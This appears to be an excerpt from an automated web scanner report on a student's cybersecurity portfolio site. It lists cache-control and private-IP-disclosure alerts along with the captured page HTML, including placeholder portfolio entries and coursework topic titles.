          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Parameter
          Cache-Control
          Solution

          Whenever possible ensure the cache-control HTTP header is set with no-cache, no-store, must-revalidate.

        3. GET https://beekmans.dev/cdn-cgi/l/email-protection
          Alert tags
          Alert description

          The cache-control header has not been set properly or is missing, allowing the browser and proxies to cache content.

          Request
          Request line and header section (250 bytes)
          GET https://beekmans.dev/cdn-cgi/l/email-protection HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (226 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          X-Frame-Options: DENY
          Server: cloudflare
          CF-RAY: 6b94a32b6a450c09-AMS
          X-Content-Type-Options: nosniff
          
          
          Response body (4234 bytes)
          <!DOCTYPE html>
          <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
          <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
          <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
          <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
          <head>
          <title>Email Protection | Cloudflare</title>
          <meta charset="UTF-8" />
          <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
          <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />
          <meta name="robots" content="noindex, nofollow" />
          <meta name="viewport" content="width=device-width,initial-scale=1" />
          <link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />
          <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
          <style type="text/css">body{margin:0;padding:0}</style>
          
          
          <!--[if gte IE 10]><!-->
          <script>
            if (!navigator.cookieEnabled) {
              window.addEventListener('DOMContentLoaded', function () {
                var cookieEl = document.getElementById('cookie-alert');
                cookieEl.style.display = 'block';
              })
            }
          </script>
          <!--<![endif]-->
          
          
          </head>
          <body>
            <div id="cf-wrapper">
              <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
              <div id="cf-error-details" class="cf-error-details-wrapper">
                <div class="cf-wrapper cf-header cf-error-overview">
                  <h1 data-translate="block_headline">Email Protection</h1>
                  <h2 class="cf-subheadline"><span data-translate="unable_to_access">You are unable to access this email address</span> beekmans.dev</h2>
                </div><!-- /.header -->
          
                <div class="cf-section cf-wrapper">
                  <div class="cf-columns two">
                    <div class="cf-column">
                      <p>The website from which you got to this page is protected by Cloudflare. Email addresses on that page have been hidden in order to keep them from being accessed by malicious bots. <strong>You must enable Javascript in your browser in order to decode the e-mail address</strong>.</p>
                      <p>If you have a website and are interested in protecting it in a similar way, you can <a rel="noopener noreferrer" href="https://www.cloudflare.com/sign-up?utm_source=email_protection">sign up for Cloudflare</a>.</p>
                    </div>
          
                    <div class="cf-column">
                      <div class="grid_4">
                        <div class="rail">
                            <div class="panel">
                                <ul class="nobullets">
                                  <li><a rel="noopener noreferrer" class="modal-link-faq" href="https://support.cloudflare.com/hc/en-us/articles/200170016-What-is-Email-Address-Obfuscation-">How does Cloudflare protect email addresses on website from spammers?</a></li>
                                  <li><a rel="noopener noreferrer" class="modal-link-faq" href="https://support.cloudflare.com/hc/en-us/categories/200275218-Getting-Started">Can I sign up for Cloudflare?</a></li>
                              </ul>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div><!-- /.section -->
          
                <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
            <p class="text-13">
              <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">6b94a32b6a450c09</strong></span>
              <span class="cf-footer-separator sm:hidden">&bull;</span>
              <span class="cf-footer-item sm:block sm:mb-1"><span>Your IP</span>: 145.93.113.188</span>
              <span class="cf-footer-separator sm:hidden">&bull;</span>
              <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
              
            </p>
          </div><!-- /.error-footer -->
          
          
              </div><!-- /#cf-error-details -->
            </div><!-- /#cf-wrapper -->
          
            <script type="text/javascript">
            window._cf_translation = {};
            
            
          </script>
          
          </body>
          </html>
          
          Parameter
          Cache-Control
          Solution

          Whenever possible ensure the cache-control HTTP header is set with no-cache, no-store, must-revalidate.

      4. Private IP Disclosure (2)
        1. GET https://beekmans.dev
          Alert tags
          Alert description

          A private IP (such as 10.x.x.x, 172.x.x.x, 192.168.x.x) or an Amazon EC2 private hostname (for example, ip-10-0-56-78) has been found in the HTTP response body. This information might be helpful for further attacks targeting internal systems.

          Other info

          172.16.0.2

          172.16.0.3

          10.10.14.40:8888

          10.10.14.40:8888

          10.10.14.88:8888

          172.18.0.1

          172.18.0.100

          172.18.0.100

          10.10.14.161

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
